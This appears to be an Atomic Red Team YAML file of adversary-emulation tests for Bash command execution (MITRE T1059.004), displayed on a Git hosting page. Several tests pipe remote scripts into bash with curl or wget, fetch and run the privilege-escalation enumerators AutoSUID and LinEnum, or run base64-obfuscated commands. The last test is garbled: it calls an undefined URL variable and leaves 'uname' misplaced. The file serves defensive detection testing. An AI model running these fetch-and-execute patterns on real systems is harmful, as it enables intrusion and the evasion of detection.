adam/atomic-red-team-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
62a85c12b51a6d903a8357cb91b555ff1b203fd3
atomic-red-team-gs/atomics/T1059.004/T1059.004.yaml
T
Hare Sudhan 62a85c12b5 FreeBSD changes (#2585) 
* freebsd changes

* renaming freebsd to linux
2023-11-06 17:41:43 -05:00

334 lines
14 KiB
YAML
Raw Blame History

attack_technique: T1059.004
display_name: 'Command and Scripting Interpreter: Bash'
atomic_tests:
- name: Create and Execute Bash Shell Script
auto_generated_guid: 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873
description: |
Creates and executes a simple sh script.
supported_platforms:
- linux
- macos
input_arguments:
script_path:
description: Script path
type: path
default: /tmp/art.sh
executor:
command: |
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 8.8.8.8' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
cleanup_command: |
rm #{script_path}
name: sh
- name: Command-Line Interface
auto_generated_guid: d0c88567-803d-4dca-99b4-7ce65e7b257c
description: |
Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server.
Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
supported_platforms:
- linux
- macos
executor:
command: |
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
cleanup_command: |
rm /tmp/art-fish.txt
name: sh
- name: Harvest SUID executable files
auto_generated_guid: 46274fc6-08a7-4956-861b-24cbbaa0503c
description: |
AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges.
supported_platforms:
- linux
input_arguments:
autosuid:
description: Path to the autosuid shell script
type: path
default: PathToAtomicsFolder/T1059.004/src/AutoSUID.sh
autosuid_url:
description: Path to download autosuid shell script
type: url
default: https://raw.githubusercontent.com/IvanGlinkin/AutoSUID/main/AutoSUID.sh
dependency_executor_name: bash
dependencies:
- description: |
AutoSUID must exist on disk at specified location (#{autosuid})
prereq_command: |
if [ -f #{autosuid} ]; then exit 0; else exit 1; fi;
get_prereq_command: |
curl --create-dirs #{autosuid_url} --output #{autosuid}
executor:
command: |
chmod +x #{autosuid}
bash #{autosuid}
cleanup_command: |
rm -rf #{autosuid}
name: sh
- name: LinEnum tool execution
auto_generated_guid: a2b35a63-9df1-4806-9a4d-5fe0500845f2
description: |
LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host.
supported_platforms:
- linux
input_arguments:
linenum:
description: Path to the LinEnum shell script
type: path
default: PathToAtomicsFolder/T1059.004/src/LinEnum.sh
linenum_url:
description: Path to download LinEnum shell script
type: url
default: https://raw.githubusercontent.com/rebootuser/LinEnum/c47f9b226d3ce2848629f25fe142c1b2986bc427/LinEnum.sh
dependency_executor_name: bash
dependencies:
- description: |
LinnEnum must exist on disk at specified location (#{linenum})
prereq_command: |
if [ -f #{linenum} ]; then exit 0; else exit 1; fi;
get_prereq_command: |
curl --create-dirs #{linenum_url} --output #{linenum}
executor:
command: |
chmod +x #{linenum}
bash #{linenum}
cleanup_command: |
rm -rf #{linenum}
name: sh
- name: New script file in the tmp directory
auto_generated_guid: 8cd1947b-4a54-41fb-b5ea-07d0ace04f81
description: |
An attacker may create script files in the /tmp directory using the mktemp utility and execute them. The following commands creates a temp file and places a pointer to it in the variable $TMPFILE, echos the string id into it, and then executes the file using bash, which results in the id command being executed.
supported_platforms:
- linux
executor:
name: sh
elevation_required: false
command: |
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
cleanup_command: |
rm $TMPFILE
unset TMPFILE
- name: What shell is running
auto_generated_guid: 7b38e5cc-47be-44f0-a425-390305c76c17
description: |
An adversary will want to discover what shell is running so that they can tailor their attacks accordingly. The following commands will discover what shell is running.
supported_platforms:
- linux
executor:
name: sh
elevation_required: false
command: |
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
- name: What shells are available
auto_generated_guid: bf23c7dc-1004-4949-8262-4c1d1ef87702
description: |
An adversary may want to discover which shell's are available so that they might switch to that shell to tailor their attacks to suit that shell. The following commands will discover what shells are available on the host.
supported_platforms:
- linux
executor:
name: sh
elevation_required: false
command: |
cat /etc/shells
- name: Command line scripts
auto_generated_guid: b04ed73c-7d43-4dc8-b563-a2fc595cba1a
description: |
An adversary may type in elaborate multi-line shell commands into a terminal session because they can't or don't wish to create script files on the host. The following command is a simple loop, echoing out Atomic Red Team was here!
supported_platforms:
- linux
executor:
name: sh
command: |
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
- name: Obfuscated command line scripts
auto_generated_guid: 5bec4cc8-f41e-437b-b417-33ff60acf9af
description: |
An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to bash, which results in the id command being executed.
supported_platforms:
- linux
executor:
name: sh
elevation_required: false
command: |
ART=$(echo -n "id" |base64 -w 0)
echo "\$ART=$ART"
echo -n "$ART" |base64 -d |/bin/bash
unset ART
- name: Obfuscated command line scripts (freebsd)
auto_generated_guid: 5dc1d9dd-f396-4420-b985-32b1c4f79062
description: |
An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to bash, which results in the id command being executed.
supported_platforms:
- linux
executor:
name: sh
elevation_required: false
command: |
ART=$(echo -n "id" |b64encode -r -)
echo "\$ART=$ART"
echo -n "$ART" |b64decode -r |/bin/sh
unset ART
- name: Change login shell
auto_generated_guid: c7ac59cb-13cc-4622-81dc-6d2fee9bfac7
description: |
An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/bash shell, changes the users shell to sh, then deletes the art user.
supported_platforms:
- linux
dependencies:
- description: |
chsh - change login shell, must be installed
prereq_command: |
if [ -f /usr/bin/chsh ]; then echo "exit 0"; else echo "exit 1"; exit 1; fi
get_prereq_command: |
echo "Automated installer not implemented yet, please install chsh manually"
executor:
name: bash
elevation_required: true
command: |
useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
cleanup_command: |
userdel art
- name: Change login shell (freebsd)
auto_generated_guid: 33b68b9b-4988-4caf-9600-31b7bf04227c
description: |
An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/sh shell, changes the users shell to sh, then deletes the art user.
supported_platforms:
- linux
dependencies:
- description: |
chsh - change login shell, must be installed
prereq_command: |
if [ -f /usr/bin/chsh ]; then echo "exit 0"; else echo "exit 1"; exit 1; fi
get_prereq_command: |
echo "Automated installer not implemented yet, please install chsh manually"
executor:
name: sh
elevation_required: true
command: |
pw useradd art -g wheel -s /bin/csh
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
cleanup_command: |
rmuser -y art
- name: Environment variable scripts
auto_generated_guid: bdaebd56-368b-4970-a523-f905ff4a8a51
description: |
An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/bash
supported_platforms:
- linux
executor:
name: bash
elevation_required: false
command: |
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/bash
cleanup_command: |
unset ART
- name: Environment variable scripts (freebsd)
auto_generated_guid: 663b205d-2121-48a3-a6f9-8c9d4d87dfee
description: |
An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/sh
supported_platforms:
- linux
executor:
name: sh
elevation_required: false
command: |
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
cleanup_command: |
unset ART
- name: Detecting pipe-to-shell
auto_generated_guid: fca246a8-a585-4f28-a2df-6495973976a1
description: |
An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage of this BLIND install method and selectively running extra commands in the install script for those who DO pipe to bash and not for those who DO NOT. This test uses curl to download the pipe-to-shell.sh script, the first time without piping it to bash and the second piping it into bash which executes the echo command.
supported_platforms:
- linux
input_arguments:
remote_url:
description: url of remote payload
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh
dependency_executor_name: bash
dependencies:
- description: |
Check if running on a Debian based machine.
prereq_command: |
if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
get_prereq_command: |
apt update && apt install -y curl
executor:
name: bash
elevation_required: false
command: |
cd /tmp
curl -s #{remote_url}
ls -la /tmp/art.txt
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
cleanup_command: |
rm /tmp/art.txt
- name: Detecting pipe-to-shell (freebsd)
auto_generated_guid: 1a06b1ec-0cca-49db-a222-3ebb6ef25632
description: |
An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage of this BLIND install method and selectively running extra commands in the install script for those who DO pipe to bash and not for those who DO NOT. This test uses curl to download the pipe-to-shell.sh script, the first time without piping it to bash and the second piping it into bash which executes the echo command.
supported_platforms:
- linux
input_arguments:
remote_url:
description: url of remote payload
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh
dependency_executor_name: sh
dependencies:
- description: |
Check if running on a Debian based machine.
prereq_command: |
if grep -iq "FreeBSD" /etc/os-release; then echo "FreeBSD"; else echo "NOT FreeBSD"; exit 1; fi
if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
get_prereq_command: |
pkg update && pkg install -y curl
executor:
name: sh
elevation_required: false
command: |
cd /tmp
curl -s #{remote_url}
ls -la /tmp/art.txt
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
cleanup_command: |
rm /tmp/art.txt
- name: Current kernel information enumeration
auto_generated_guid: 3a53734a-9e26-4f4b-ad15-059e767f5f14
description: |
An adversary may want to enumerate the kernel information to tailor their attacks for that particular kernel. The following command will enumerate the kernel information.
supported_platforms:
- linux
executor:
name: sh
elevation_required: false
command: |
cd /tmp
curl -s #{remote_url}
ls -la /tmp/art.txt
curl -s #{remote_url} |sh
ls -la /tmp/art.txt
cleanup_command: |
rm /tmp/art.txt
uname -srm
Reference in New Issue View Git Blame Copy Permalink